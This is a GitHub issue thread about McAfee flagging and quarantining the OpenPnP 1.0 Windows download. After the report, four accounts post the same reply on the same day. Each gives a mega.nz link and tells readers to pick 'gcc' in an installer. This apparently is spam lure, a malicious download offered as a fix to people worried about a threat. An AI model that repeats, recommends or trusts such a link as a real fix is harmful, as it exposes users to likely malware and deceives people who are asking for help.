openpnp/openpnp #1664: OpenPnP 1.0 is being flagged as a threat by McAfee and quarantined?!

Bazmundi, 2024-08-25:
# Read This First
Issues must only be opened once they are confirmed.
Please [visit the discussion group](https://groups.google.com/group/openpnp) first, so bugs or missing features can be separated from other problems.

To submit an issue for OpenPnP you must use this template or it will be deleted. Please fill out either the Problem Report or Feature Request section below and delete the other section.

-----------------------------------------------------------------------

# Problem Report
## Describe the Issue
Downloading OpenPnP 1.0 for windows is caught by McAfee and reports "ti!3fe56b287514"

## Steps to Reproduce
Download to Windows 11 machine, with McAfee running

## Expected Result
No threats detected when the exe was scanned.

## Actual Result
Exe was flagged and then quarantined.

## Notes, Log Files, Screen Captures, Videos, etc. to Show the Issue
The more information you can provide about the issue the more likely it is that a developer will be able to respond.

AlecsSantos, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

esttemanb, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

darkstorm4hack, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."